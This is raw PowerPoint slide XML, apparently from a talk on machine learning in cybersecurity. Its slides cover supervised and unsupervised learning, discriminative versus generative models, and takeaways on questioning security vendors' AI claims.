                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="173663575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5D5CB31-B044-4D9B-9353-9219372A66B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1486183"/>
            <a:ext cx="12192000" cy="6112933"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5325285" y="842138"/>
            <a:ext cx="2280234"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Author name her</a:t>
            </a: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pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>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17" name="TextBox 16"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A3C25E5-2930-4EF4-AB86-F870C308425B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1495425" y="1931670"/>
            <a:ext cx="9753600" cy="4524315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TAKEAWAYS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Understand the new threat models that AI &amp; ML may introduce</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Educate yourself on the subject. This will become as core to most jobs as computing is today</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Ask the right questions to your suppliers </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>What problem does your software solve</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>How does it solve it?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>What is the false positive rate if anomaly detection and how many alerts can I expect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Be very sceptical to people making bold claims:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>World class academics (How many papers have they published?)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Protects against cyberattack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Protects against attacks you haven’t seen before 	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Fully automates your defence</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Focus on problems that you have a clear problem statement for</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Either build a team or partner with somebody with a track record</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Keep track of the latest developments on arxiv.org or get somebody in your team to do so</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="303282827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18" name="TextBox 17"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 18"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5148533" y="959195"/>
            <a:ext cx="2895600" cy="345743"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Picture 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{275FA079-A9C3-4CBA-A117-1467DF47EAC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst>
              <a:ext uri="{BEBA8EAE-BF5A-486C-A8C5-ECC9F3942E4B}">
                <a14:imgProps xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                  <a14:imgLayer>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="1500"/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:saturation sat="0"/>
                    </a14:imgEffect>
                  </a14:imgLayer>
                </a14:imgProps>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1486184"/>
            <a:ext cx="12192000" cy="6112933"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF1582AD-C391-4556-A4AF-388CE534CC03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="829558" y="2629687"/>
            <a:ext cx="12191999" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20714"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>THANK YOU</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3519FC91-C129-4E97-8A6C-90B0EDC31EBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1613828" y="3752322"/>
            <a:ext cx="2030144" cy="432854"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="Picture 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D76C12BF-5C7F-492A-8470-C240D8B6D371}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1161343" y="3752322"/>
            <a:ext cx="452485" cy="366299"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14043113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1288EBE8-7BBA-4F55-AE85-DD85AF1FBE3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="51000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="280219" y="58994"/>
            <a:ext cx="9143999" cy="4584700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EBF956F-8183-4CFC-BCAB-CCF1C657EE2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="921366"/>
            <a:ext cx="12170200" cy="6102003"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5325285" y="842138"/>
            <a:ext cx="2280234"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Author name her</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>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17" name="TextBox 16"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D9D8B49-C7B6-4353-900C-F519D1D70665}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7"/>
          <a:srcRect r="12566"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1486184"/>
            <a:ext cx="12194323" cy="6965014"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47212154-44E4-4107-82A0-19AE4EA02B23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2648991" y="3117574"/>
            <a:ext cx="6891692" cy="3300324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66D6322A-1056-4305-BFA8-D72D6C9B52B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1513100" y="2071281"/>
            <a:ext cx="9143999" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>EXAMPLE OF SUPERVISED LEARNING: NEURAL NETWORK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7956359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25285" y="842138"/>
            <a:ext cx="2280234"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Author name her</a:t>
            </a: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pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11"/>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17" name="TextBox 16"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D10CF458-E985-494F-8089-E57336EE3B28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:grayscl/>
          </a:blip>
          <a:srcRect l="12714" t="25040"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2324" y="1486184"/>
            <a:ext cx="12202761" cy="5936020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98CFEFEC-3004-4BFE-B0B4-07DB00920BF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228060" y="2145870"/>
            <a:ext cx="3984017" cy="2739211"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" defTabSz="457166"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>UNSUPERVISED </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" defTabSz="457166"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>LEARNING</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" defTabSz="457166"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" defTabSz="457166"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" defTabSz="457166"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>I have lots of data but no labels, so might have lots of logfile entries but don’t know which are normal, abnormal, benign or outright malicious</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="14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833108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25285" y="842138"/>
            <a:ext cx="2280234"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Author name her</a:t>
            </a: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pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11"/>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17" name="TextBox 16"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0247784-6E92-4E07-B94C-3C0DFDFB0BD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="335148" y="1720038"/>
            <a:ext cx="8707252" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DISCRIMINATIVE VS GENERATIVE MODELS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38ABFFDC-3C5D-4FA1-8EBB-A5DE7F28BDB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5787388" y="2593934"/>
            <a:ext cx="5256531" cy="3893374"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Discriminative:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>I am trying to predict the labels by examining the structure in the input data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="222222"/>
              </a:solidFill>
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="222222"/>
              </a:solidFill>
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="222222"/>
              </a:solidFill>
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="1100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="222222"/>
              </a:solidFill>
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
